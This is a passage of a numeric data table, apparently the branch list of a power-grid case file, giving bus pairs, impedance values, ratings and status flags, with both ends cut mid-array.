0, 0.006304793388429752, 0.06669899780522001, 991.0, 991.0, 991.0, 0, 1, 1, -360, 19.072 ], [123, 173, 0, 0.005247403047091413, 0.18836891696656402, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 30.309 ], [521, 174, 0, 0.013300495867768597, 0.035176796844864404, 495.0, 495.0, 495.0, 0, 1, 1, -360, 20.117 ], [37, 39, 0, 0.004338873499549862, 0.35044859579205606, 2567.0, 2567.0, 2567.0, 0, 2, 1, -360, 37.592 ], [530, 175, 0, 0.013128595041322313, 0.0347221581224188, 495.0, 495.0, 495.0, 0, 1, 1, -360, 19.857 ], [530, 176, 0, 0.005685289256198347, 0.01503630144005, 495.0, 495.0, 495.0, 0, 1, 1, -360, 8.599 ], [88, 530, 0, 0.006015867768595041, 0.0159106066755372, 495.0, 495.0, 495.0, 0, 1, 1, -360, 9.099 ], [177, 496, 0, 0.018632066115702478, 0.19711036673178398, 991.0, 991.0, 991.0, 0, 2, 1, -360, 56.361999999999995 ], [178, 525, 0, 0.03106842975206612, 0.08216895464241199, 495.0, 495.0, 495.0, 0, 1, 1, -360, 46.99100000000001 ], [179, 493, 0, 0.057079669421487594, 0.15096278779194802, 495.0, 495.0, 495.0, 0, 1, 1, -360, 86.333 ], [180, 181, 0, 0.041027438016528923, 0.10850827416682, 495.0, 495.0, 495.0, 0, 1, 1, -360, 62.053999999999995 ], [182, 180, 0, 0.00866314049586777, 0.09164817200545601, 991.0, 991.0, 991.0, 0, 2, 1, -360, 26.206 ], [179, 181, 0, 0.01957223140495868, 0.051764115772731996, 495.0, 495.0, 495.0, 0, 1, 1, -360, 29.603 ], [180, 493, 0, 0.06676561983471074, 0.17657993119175203, 495.0, 495.0, 495.0, 0, 1, 1, -360, 100.98299999999999 ], [183, 30, 0, 0.0024804362880886427, 0.356166349712776, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 28.654 ], [183, 21, 0, 0.0025647506925207757, 0.36827307214930394, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 29.628 ], [538, 185, 0, 0.018631404958677687, 0.0123189607681008, 248.0, 248.0, 248.0, 0, 1, 1, -360, 14.09 ], [538, 89, 0, 0.014509752066115702, 0.038375005396288, 495.0, 495.0, 495.0, 0, 1, 1, -360, 21.945999999999998 ], [184, 186, 0, 0.0016554709141274237, 0.059427351084826, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 9.562000000000001 ], [184, 187, 0, 0.002698753462603878, 0.09687863927102919, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 15.588 ], [520, 172, 0, 0.0034188429752066113, 0.0361682589818792, 991.0, 991.0, 991.0, 0, 2, 1, -360, 10.342 ], [89, 175, 0, 0.0037309090909090903, 0.0098674088877672, 495.0, 495.0, 495.0, 0, 1, 1, -360, 5.643 ], [185, 89, 0, 0.005812892561983471, 0.0153737832609196, 495.0, 495.0, 495.0, 0, 1, 1, -360, 8.792 ], [89, 188, 0, 0.003108760330578513, 0.008221966434607202, 495.0, 495.0, 495.0, 0, 1, 1, -360, 4.702 ], [189, 190, 0, 0.008599492151454294, 0.17364414688031998, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 37.253 ], [539, 172, 0, 0.0021570247933884296, 0.022819366646419197, 991.0, 991.0, 991.0, 0, 2, 1, -360, 6.525 ], [504, 192, 0, 0.0003084297520661157, 0.00326290713886456, 991.0, 991.0, 991.0, 0, 2, 1, -360, 0.9329999999999999 ], [105, 186, 0, 0.003273372576177285, 0.1175060580379876, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 18.907 ], [105, 187, 0, 0.0021712257617728533, 0.0779416868808324, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 12.540999999999999 ], [539, 193, 0, 0.005608595041322314, 0.01483346262541, 495.0, 495.0, 495.0, 0, 1, 1, -360, 8.482999999999999 ], [187, 194, 0, 4.8649584487534626e-05, 0.0069856037041576, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 0.562 ], [539, 540, 0, 0.004394710743801653, 0.0116230138006708, 495.0, 495.0, 495.0, 0, 1, 1, -360, 6.647 ], [539, 196, 0, 0.00332297520661157, 0.008788516227194, 495.0, 495.0, 495.0, 0, 1, 1, -360, 5.026 ], [197, 540, 0, 0.004737190082644629, 0.012528794024621601, 495.0, 495.0, 495.0, 0, 1, 1, -360, 7.165 ], [110, 198, 0, 0.00018724030470914128, 0.02688587333118328, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 2.1630000000000003 ], [197, 539, 0, 0.009172231404958677, 0.024258473063998802, 495.0, 495.0, 495.0, 0, 1, 1, -360, 13.873 ], [199, 537, 0, 0.03612826446280991, 0.0238877676441712, 248.0, 248.0, 248.0, 0, 1, 1, -360, 27.322 ], [134, 526, 0, 0.007771239669421488, 0.020553167475975197, 495.0, 495.0, 495.0, 0, 1, 1, -360, 11.754000000000001 ], [200, 193, 0, 0.0009322314049586776, 0.009862163056380801, 991.0, 991.0, 991.0, 0, 2, 1, -360, 2.82 ], [4, 201, 0, 0.013726108033240996, 0.49273365914097605, 1711.0, 1711.0, 1711.0, 0, 2, 1, -360, 79.282 ], [202, 86, 0, 0.00013365650969529087, 0.00479794133417816, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 0.772 ], [85, 203, 0, 0.0019011426592797783, 0.2729854600553416, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 21.962 ], [147, 204, 0, 0.0073874380165289254, 0.0781523963903056, 991.0, 991.0, 991.0, 0, 2, 1, -360, 22.346999999999998 ], [147, 205, 0, 0.005959669421487603, 0.00394049369636956, 248.0, 248.0, 248.0, 0, 1, 1, -360, 4.507 ], [123, 206, 0, 0.0005753116343490305, 0.0826091142668064, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 6.646 ], [537, 207, 0, 0.018456198347107437, 0.048812461297776, 495.0, 495.0, 495.0, 0, 1, 1, -360, 27.915 ], [165, 208, 0, 0.00414612188365651, 0.14883562055771601, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 23.948 ], [4, 94, 0, 0.013687673130193905, 0.49135394025941603, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 79.06 ], [4, 2, 0, 5.2054478301015697e-05, 0.016817654469309, 5134.0, 5134.0, 5134.0, 0, 3, 1, -360, 0.902 ], [209, 4, 0, 0.0022369286703601107, 0.32120104149338397, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 25.840999999999998 ], [119, 163, 0, 0.003535145429362881, 0.12690306230914922, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 20.419 ], [210, 3, 0, 0.0003150969529085873, 0.011311208844832242, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 1.82 ], [99, 211, 0, 0.0035045013850415513, 0.1258030161741948, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 20.242 ], [99, 69, 0, 0.021717970914127423, 0.7796219621557, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 125.443 ], [212, 99, 0, 0.008453774238227147, 0.30346978938770003, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 48.82899999999999 ], [213, 214, 0, 0.01490115702479339, 0.15764073118032798, 991.0, 991.0, 991.0, 0, 2, 1, -360, 45.076 ], [510, 215, 0, 0.002174710743801653, 0.09202587186721281, 1981.0, 1981.0, 1981.0, 0, 4, 1, -360, 13.157 ], [128, 69, 0, 0.010711651662049862, 1.538088234801848, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 123.741 ], [216, 69, 0, 0.009628462603878117, 1.3825528982351443, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 111.228 ], [217, 98, 0, 0.0012787396121883656, 0.045903620070299994, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 7.386 ], [504, 218, 0, 0.027480991735537193, 0.072680994226412, 495.0, 495.0, 495.0, 0, 1, 1, -360, 41.565 ], [177, 504, 0, 0.07054809917355372, 0.18658373169634002, 495.0, 495.0, 495.0, 0, 1, 1, -360, 106.704 ], [219, 209, 0, 0.003938798476454294, 0.5655728721401839, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 45.501000000000005 ], [219, 220, 0, 0.0013026315789473684, 0.1870451326342096, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 15.048 ], [94, 95, 0, 0.01070740997229917, 0.38436979242743197, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 61.846000000000004 ], [159, 221, 0, 0.009937153739612188, 0.356719480257712, 1711.0, 1711.0, 1711.0, 0, 2, 1, -360, 57.397 ], [34, 161, 0, 0.010965289256198347, 0.116002818645824, 991.0, 991.0, 991.0, 0, 2, 1, -360, 33.17 ], [222, 221, 0, 0.0046457756232686975, 0.16677196601221997, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 26.834 ], [211, 52, 0, 0.05267313019390582, 0.472709090515552, 856.0, 856.0, 856.0, 0, 1, 1, -360, 152.12 ], [215, 223, 0, 0.04873190082644628, 0.128884831985184, 495.0, 495.0, 495.0, 0, 1, 1, -360, 73.707 ], [224, 215, 0, 0.019086280991735535, 0.050478887076288004, 495.0, 495.0, 495.0, 0, 1, 1, -360, 28.868000000000002 ], [225, 224, 0, 0.04200925619834711, 0.11110496071615601, 495.0, 495.0, 495.0, 0, 1, 1, -360, 63.538999999999994 ], [224, 223, 0, 0.031061818181818183, 0.082151468537468, 495.0, 495.0, 495.0, 0, 1, 1, -360, 46.981 ], [226, 6, 0, 0.06420099173553719, 0.0424492677936932, 248.0, 248.0, 248.0, 0, 1, 1, -360, 48.552 ], [7, 3, 0, 0.009332929362880887, 0.335029305054692, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 53.907 ], [216, 227, 0, 0.01989941135734072, 0.7143401282507, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 114.939 ], [228, 229, 0, 0.010545454545454545, 0.027890337012274, 495.0, 495.0, 495.0, 0, 1, 1, -360, 15.95 ], [227, 230, 0, 0.003993074792243767, 0.573366419334696, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 46.128 ], [231, 53, 0, 0.007193213296398893, 1.0328749562310842, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 83.096 ], [544, 545, 0, 0.013061818181818181, 0.034545548464856, 495.0, 495.0, 495.0, 0, 1, 1, -360, 19.756 ], [234, 235, 0, 0.04608859504132231, 0.121893887321888, 495.0, 495.0, 495.0, 0, 1, 1, -360, 69.709 ], [546, 214, 0, 0.057025454545454546, 0.15081940173295602, 495.0, 495.0, 495.0, 0, 1, 1, -360, 86.251 ], [233, 227, 0, 0.0029001038781163438, 0.1041066260218888, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 16.750999999999998 ], [237, 238, 0, 0.026324628099173554, 0.06962267451304, 495.0, 495.0, 495.0, 0, 1, 1, -360, 39.816 ], [212, 100, 0, 0.007955505540166205, 0.285583163531816, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 45.951 ], [519, 239, 0, 0.01740429752066116, 0.046030422038308406, 495.0, 495.0, 495.0, 0, 1, 1, -360, 26.324 ], [238, 519, 0, 0.015166280991735538, 0.040111375593995205, 495.0, 495.0, 495.0, 0, 1, 1, -360, 22.939 ], [213, 240, 0, 0.01665388429752066, 0.04404574915373599, 1200.0, 1200.0, 1200.0, 0, 1, 1, -360, 25.189 ], [241, 242, 0, 0.009862015235457064, 0.3540221919932281, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 56.963 ], [70, 241, 0, 0.003819858033240997, 0.5484941897752321, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 44.126999999999995 ], [509, 213, 0, 0.011363636363636364, 0.120216969880216, 991.0, 991.0, 991.0, 0, 2, 1, -360, 34.375 ], [68, 243, 0, 0.003611668975069252, 0.1296500701715312, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 20.861 ], [243, 244, 0, 0.0007699099722991691, 0.027637882270859202, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 4.447 ], [68, 244, 0, 0.004104051246537396, 0.147325387728876, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 23.705 ], [544, 547, 0, 0.02418776859504132, 0.255884661882476, 991.0, 991.0, 991.0, 0, 1, 1, -360, 73.168 ], [245, 227, 0, 0.012676419667590028, 0.45505241780707606, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 73.219 ], [246, 208, 0, 0.0010155817174515235, 0.0364568961999408, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 5.8660000000000005 ], [112, 208, 0, 0.0017927631578947367, 0.0643558063672372, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 10.355 ], [165, 247, 0, 0.0002113919667590028, 0.0075884538459086, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 1.2209999999999999 ], [537, 549, 0, 0.00032066115702479337, 0.00084807607842936, 495.0, 495.0, 495.0, 0, 1, 1, -360, 0.485 ], [537, 550, 0, 0.00032198347107438016, 0.0008515732993697601, 495.0, 495.0, 495.0, 0, 1, 1, -360, 0.48700000000000004 ], [537, 551, 0, 0.0002651239669421488, 0.0007011927988648, 495.0, 495.0, 495.0, 0, 1, 1, -360, 0.401 ], [110, 251, 0, 0.00023857340720221602, 0.008564200982522441, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 1.3780000000000001 ], [510, 252, 0, 0.08467702479338843, 0.055987884365424005, 248.0, 248.0, 248.0, 0, 1, 1, -360, 64.03699999999999 ], [529, 253, 0, 0.04859504132231405, 0.12852286961777998, 495.0, 495.0, 495.0, 0, 1, 1, -360, 73.5 ], [237, 239, 0, 0.03309421487603306, 0.08752669712542799, 495.0, 495.0, 495.0, 0, 1, 1, -360, 50.055 ], [254, 238, 0, 0.07815008264462811, 0.05167231372274401, 248.0, 248.0, 248.0, 0, 1, 1, -360, 59.101000000000006 ], [69, 255, 0, 0.0009369806094182826, 0.134541235754472, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 10.824000000000002 ], [510, 225, 0, 0.021953719008264466, 0.232250442756508, 991.0, 991.0, 991.0, 0, 1, 1, -360, 66.41 ], [256, 257, 0, 0.010125619834710746, 0.0267799693631888, 495.0, 495.0, 495.0, 0, 1, 1, -360, 15.315 ], [258, 190, 0, 0.011717451523545707, 0.10515695255750121, 856.0, 856.0, 856.0, 0, 1, 1, -360, 33.84 ], [258, 259, 0, 0.015782548476454293, 0.1416387085570408, 856.0, 856.0, 856.0, 0, 1, 1, -360, 45.58 ], [260, 261, 0, 0.006791031855955679, 0.9751256416231477, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 78.45 ], [554, 553, 0, 0.17583338842975205, 0.11625986438453201, 248.0, 248.0, 248.0, 0, 1, 1, -360, 132.974 ], [515, 263, 0, 0.006987107438016529, 0.0739172618295936, 991.0, 991.0, 991.0, 0, 2, 1, -360, 21.136 ], [14, 264, 0, 0.01700694214876033, 0.17991802858084, 991.0, 991.0, 991.0, 0, 1, 1, -360, 51.446000000000005 ], [116, 555, 0, 0.0009768595041322315, 0.0103342878835768, 991.0, 991.0, 991.0, 0, 2, 1, -360, 2.955 ], [151, 116, 0, 0.007244958677685951, 0.0191612735410668, 495.0, 495.0, 495.0, 0, 1, 1, -360, 10.958 ], [111, 114, 0, 0.008806613573407202, 0.3161358573133961, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 50.867 ], [77, 111, 0, 0.00288452216066482, 0.41418912211817605, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 33.321999999999996 ], [266, 525, 0, 0.01042909090909091, 0.027582581569373602, 495.0, 495.0, 495.0, 0, 1, 1, -360, 15.774000000000001 ], [267, 120, 0, 0.013136945983379503, 0.471584184581432, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 75.87899999999999 ], [268, 269, 0, 0.0010327272727272726, 0.0027313295556817604, 495.0, 495.0, 495.0, 0, 1, 1, -360, 1.5619999999999998 ], [556, 271, 0, 0.052289586776859506, 0.0345735262323792, 248.0, 248.0, 248.0, 0, 1, 1, -360, 39.544000000000004 ], [556, 272, 0, 0.04685355371900827, 0.030979257409249603, 248.0, 248.0, 248.0, 0, 1, 1, -360, 35.433 ], [529, 273, 0, 0.0034604958677685953, 0.009152227205140799, 495.0, 495.0, 495.0, 0, 1, 1, -360, 5.234 ], [128, 274, 0, 0.0029350761772853184, 0.1053620459045884, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 16.953 ], [34, 275, 0, 0.0008290909090909092, 0.00054818938265696, 248.0, 248.0, 248.0, 0, 1, 1, -360, 0.627 ], [503, 276, 0, 0.006707438016528925, 0.07095861291266, 991.0, 991.0, 991.0, 0, 2, 1, -360, 20.29 ], [503, 504, 0, 0.06432727272727272, 0.680524223098808, 991.0, 991.0, 991.0, 0, 2, 1, -360, 194.59 ], [177, 218, 0, 0.04330380165289256, 0.114528740018308, 495.0, 495.0, 495.0, 0, 1, 1, -360, 65.497 ], [277, 278, 0, 0.007191135734072023, 1.032576638635032, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 83.072 ], [557, 558, 0, 0.04341289256198347, 0.258338836678648, 743.0, 743.0, 743.0, 0, 1, 1, -360, 98.493 ], [557, 559, 0, 0.03415867768595042, 0.09034195998366001, 495.0, 495.0, 495.0, 0, 1, 1, -360, 51.665 ], [559, 558, 0, 0.04474314049586777, 0.11833546501370001, 495.0, 495.0, 495.0, 0, 1, 1, -360, 67.67399999999999 ], [277, 78, 0, 0.03585768698060942, 0.32180078416049196, 856.0, 856.0, 856.0, 0, 1, 1, -360, 103.557 ], [277, 279, 0, 0.021390927977839334, 0.191970480441328, 856.0, 856.0, 856.0, 0, 1, 1, -360, 61.777 ], [78, 279, 0, 0.015811980609418283, 0.1419028439283376, 856.0, 856.0, 856.0, 0, 1, 1, -360, 45.665 ], [281, 282, 0, 0.0023178670360110803, 0.08320574945862161, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 13.388 ], [283, 161, 0, 0.036741157024793386, 0.09717203248350399, 495.0, 495.0, 495.0, 0, 2, 1, -360, 55.571000000000005 ], [268, 161, 0, 0.018883636363636366, 0.199771751868832, 991.0, 991.0, 991.0, 0, 2, 1, -360, 57.123000000000005 ], [256, 284, 0, 0.010755371900826446, 0.113782083346976, 991.0, 991.0, 991.0, 0, 2, 1, -360, 32.535 ], [515, 516, 0, 0.04071140495867769, 0.107672438361532, 495.0, 495.0, 495.0, 0, 1, 1, -360, 61.576 ], [263, 516, 0, 0.0030355371900826445, 0.128452925198488, 1981.0, 1981.0, 1981.0, 0, 2, 1, -360, 18.365 ], [516, 285, 0, 0.006908429752066116, 0.018271230811372, 495.0, 495.0, 495.0, 0, 1, 1, -360, 10.449000000000002 ], [63, 286, 0, 0.019088925619834708, 0.050485881518556, 495.0, 495.0, 495.0, 0, 1, 1, -360, 28.872 ], [287, 516, 0, 0.01732892561983471, 0.011457770111127998, 248.0, 248.0, 248.0, 0, 1, 1, -360, 13.105 ], [8, 102, 0, 0.015100069252077563, 0.542055501663692, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 87.21799999999999 ], [8, 101, 0, 0.019246883656509697, 0.69091598202144, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 111.17 ], [80, 288, 0, 0.007984072022160666, 0.2866086302684072, 1711.0, 1711.0, 1711.0, 0, 2, 1, -360, 46.11600000000001 ], [80, 289, 0, 0.0003782317636201524, 0.122198345223416, 5134.0, 5134.0, 5134.0, 0, 4, 1, -360, 6.553999999999999 ], [276, 560, 0, 0.01778314049586777, 0.047032375838192794, 495.0, 495.0, 495.0, 0, 2, 1, -360, 26.897 ], [37, 290, 0, 0.005629501385041551, 0.4546919507138321, 2567.0, 2567.0, 2567.0, 0, 2, 1, -360, 48.773999999999994 ], [290, 74, 0, 0.02071595106187673, 1.673216783321968, 2567.0, 2567.0, 2567.0, 0, 2, 1, -360, 179.483 ], [512, 291, 0, 0.0053299173553719, 0.056385693247479204, 991.0, 991.0, 991.0, 0, 2, 1, -360, 16.123 ], [78, 292, 0, 0.0058149815327908595, 0.469673087481408, 2567.0, 2567.0, 2567.0, 0, 2, 1, -360, 50.381 ], [199, 548, 0, 0.0015530578512396695, 0.00410748599634868, 495.0, 495.0, 495.0, 0, 1, 1, -360, 2.349 ], [491, 293, 0, 0.014176528925619833, 0.009373426429729999, 248.0, 248.0, 248.0, 0, 1, 1, -360, 10.720999999999998 ], [4, 294, 0, 9.669321329639889e-05, 0.013884198109531681, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 1.117 ], [490, 541, 0, 0.050580495867768596, 0.133773946861896, 495.0, 495.0, 495.0, 0, 1, 1, -360, 76.503 ], [491, 295, 0, 0.010613553719008264, 0.028070443890777202, 495.0, 495.0, 495.0, 0, 1, 1, -360, 16.053 ], [491, 296, 0, 0.004400661157024794, 0.0116387512948784, 495.0, 495.0, 495.0, 0, 1, 1, -360, 6.656000000000001 ], [295, 297, 0, 0.020297520661157024, 0.053682341459340005, 495.0, 495.0, 495.0, 0, 1, 1, -360, 30.7 ], [508, 161, 0, 0.023239669421487603, 0.061463658055360006, 495.0, 495.0, 495.0, 0, 1, 1, -360, 35.15 ], [117, 123, 0, 0.005876211911357341, 0.21094161505628, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 33.941 ], [133, 117, 0, 0.004469182825484764, 0.0401081792747688, 856.0, 856.0, 856.0, 0, 1, 1, -360, 12.907 ], [71, 74, 0, 0.03904524469065097, 0.7884161162841721, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 169.144 ], [74, 278, 0, 0.0077122576177285325, 1.10740463560792, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 89.09200000000001 ], [298, 515, 0, 0.021701157024793388, 0.05739464148919599, 495.0, 495.0, 495.0, 0, 1, 1, -360, 32.823 ], [5, 299, 0, 0.0016232686980609415, 0.058271370400665996, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 9.376 ], [32, 292, 0, 0.009679362880886427, 0.34746541983297996, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 55.908 ], [5, 29, 0, 0.00743395083102493, 1.0674425076571843, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 85.87700000000001 ], [503, 560, 0, 0.015140495867768593, 0.160172719142436, 991.0, 991.0, 991.0, 0, 1, 1, -360, 45.8 ], [300, 301, 0, 0.004892053324099723, 0.7024509290644521, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 56.513000000000005 ], [51, 300, 0, 0.002573493767313019, 0.3695284920307039, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 29.729 ], [244, 302, 0, 0.007714508310249307, 1.107727813004004, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 89.118 ], [31, 302, 0, 0.004369113573407203, 0.6273619041941161, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 50.472 ], [51, 282, 0, 0.006288434903047093, 0.9029576432132521, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 72.64399999999999 ], [303, 304, 0, 8.795013850415512e-05, 0.000789298639172312, 856.0, 856.0, 856.0, 0, 1, 1, -360, 0.254 ], [305, 304, 0, 0.003881117266849031, 0.0783689646873844, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 16.813 ], [305, 259, 0, 0.0025625, 0.36794989475177603, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 29.601999999999997 ], [306, 307, 0, 0.03223268698060942, 0.289268628831688, 856.0, 856.0, 856.0, 0, 1, 1, -360, 93.088 ], [305, 308, 0, 0.0024272853185595567, 0.0217833994511184, 856.0, 856.0, 856.0, 0, 1, 1, -360, 7.01 ], [305, 309, 0, 0.011014773776523545, 0.22241441259921202, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 47.716 ], [310, 309, 0, 0.009565962603878117, 0.343394627639832, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 55.253 ], [306, 309, 0, 0.035333795013850415, 0.31709917455019604, 856.0, 856.0, 856.0, 0, 1, 1, -360, 102.044 ], [311, 280, 0, 0.003433691135734072, 0.1232611016590444, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 19.833 ], [280, 278, 0, 0.009749769159764544, 0.7874838737974121, 2567.0, 2567.0, 2567.0, 0, 1, 1, -360, 84.47200000000001 ], [311, 32, 0, 0.01205909510619806, 0.9740069506375919, 2567.0, 2567.0, 2567.0, 0, 2, 1, -360, 104.48 ], [13, 312, 0, 0.0043324965373961214, 0.622104056565324, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 50.049 ], [313, 314, 0, 0.006092624653739613, 0.218710302449316, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 35.191 ], [312, 313, 0, 0.00893957756232687, 0.32090893884734, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 51.635 ], [547, 566, 0, 0.027035702479338848, 0.286013220297816, 991.0, 991.0, 991.0, 0, 1, 1, -360, 81.783 ], [245, 315, 0, 0.014162569252077564, 0.508401547875772, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 81.803 ], [312, 316, 0, 8.803670360110802e-05, 0.01264120812658816, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 1.0170000000000001 ], [312, 314, 0, 0.005339854570637119, 0.191687700220296, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 30.843000000000004 ], [554, 546, 0, 0.08174743801652892, 0.21620344446439202, 495.0, 495.0, 495.0, 0, 1, 1, -360, 123.64299999999999 ], [262, 216, 0, 0.042641966759002774, 0.38268554099981195, 856.0, 856.0, 856.0, 0, 1, 1, -360, 123.15 ], [317, 233, 0, 0.005647276084951523, 0.114031901035644, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 24.464000000000002 ], [318, 317, 0, 0.008311634349030471, 0.16783161497270002, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 36.006 ], [231, 52, 0, 0.035263677285318554, 1.2658796434850879, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 203.683 ], [319, 567, 0, 0.006089586776859504, 0.0644223069721, 991.0, 991.0, 991.0, 0, 1, 1, -360, 18.421 ], [557, 321, 0, 0.010004628099173555, 0.10583989458750401, 991.0, 991.0, 991.0, 0, 2, 1, -360, 30.264 ], [277, 65, 0, 0.009430170821779778, 0.7616700793261759, 2567.0, 2567.0, 2567.0, 0, 2, 1, -360, 81.703 ], [322, 288, 0, 0.006545013850415513, 0.528637424797136, 2567.0, 2567.0, 2567.0, 0, 2, 1, -360, 56.706 ], [322, 323, 0, 0.0018503000923372577, 0.14944779312484, 2567.0, 2567.0, 2567.0, 0, 2, 1, -360, 16.031 ], [277, 324, 0, 0.019719529085872576, 0.39818407235049996, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 85.425 ], [324, 325, 0, 0.01103508771932133, 0.22282459929396403, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 47.803999999999995 ], [277, 325, 0, 0.008665743305609418, 0.174981914850048, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 37.54 ], [326, 327, 0, 0.007654214876033058, 0.0202436634226288, 495.0, 495.0, 495.0, 0, 1, 1, -360, 11.577 ], [328, 326, 0, 0.10300958677685952, 0.068109252150368, 248.0, 248.0, 248.0, 0, 1, 1, -360, 77.90100000000001 ], [328, 327, 0, 0.09827173553719008, 0.064976616491468, 248.0, 248.0, 248.0, 0, 1, 1, -360, 74.318 ], [326, 329, 0, 0.028062148760330575, 0.07421802283046801, 495.0, 495.0, 495.0, 0, 1, 1, -360, 42.443999999999996 ], [568, 329, 0, 0.05699900826446282, 0.15074945731414802, 495.0, 495.0, 495.0, 0, 1, 1, -360, 86.211 ], [568, 326, 0, 0.03218644628099173, 0.08512585494846397, 495.0, 495.0, 495.0, 0, 1, 1, -360, 48.681999999999995 ], [332, 78, 0, 0.006471029547541551, 0.522661750455416, 2567.0, 2567.0, 2567.0, 0, 2, 1, -360, 56.065 ], [333, 306, 0, 0.008580159279778392, 0.308006702824228, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 49.559 ], [332, 333, 0, 0.007504674515235457, 0.26939943395502003, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 43.347 ], [332, 334, 0, 0.017124653739612188, 0.15368328149175597, 856.0, 856.0, 856.0, 0, 1, 1, -360, 49.456 ], [66, 334, 0, 0.030625, 0.27484062260471603, 856.0, 856.0, 856.0, 0, 1, 1, -360, 88.445 ], [330, 335, 0, 0.00550536703601108, 0.790516769355108, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 63.598 ], [336, 66, 0, 0.015054362880886425, 0.1351036887216764, 856.0, 856.0, 856.0, 0, 1, 1, -360, 43.477 ], [330, 336, 0, 0.039036357340720224, 0.350327404269788, 856.0, 856.0, 856.0, 0, 1, 1, -360, 112.73700000000001 ], [68, 70, 0, 0.016314058171745152, 0.14640868261713597, 856.0, 856.0, 856.0, 0, 1, 1, -360, 47.115 ], [509, 337, 0, 0.03494082644628099, 0.09241056617056001, 495.0, 495.0, 495.0, 0, 1, 1, -360, 52.848 ], [324, 288, 0, 0.012627423822714683, 0.11332339674541761, 856.0, 856.0, 856.0, 0, 1, 1, -360, 36.468 ], [338, 559, 0, 0.009228099173553718, 0.097624922595552, 991.0, 991.0, 991.0, 0, 2, 1, -360, 27.915 ], [339, 559, 0, 0.03560595041322315, 0.023542417076125203, 248.0, 248.0, 248.0, 0, 1, 1, -360, 26.927 ], [339, 340, 0, 0.08711537190082644, 0.23040041287850396, 495.0, 495.0, 495.0, 0, 1, 1, -360, 131.762 ], [559, 340, 0, 0.20983272727272728, 0.138740000599684, 248.0, 248.0, 248.0, 0, 1, 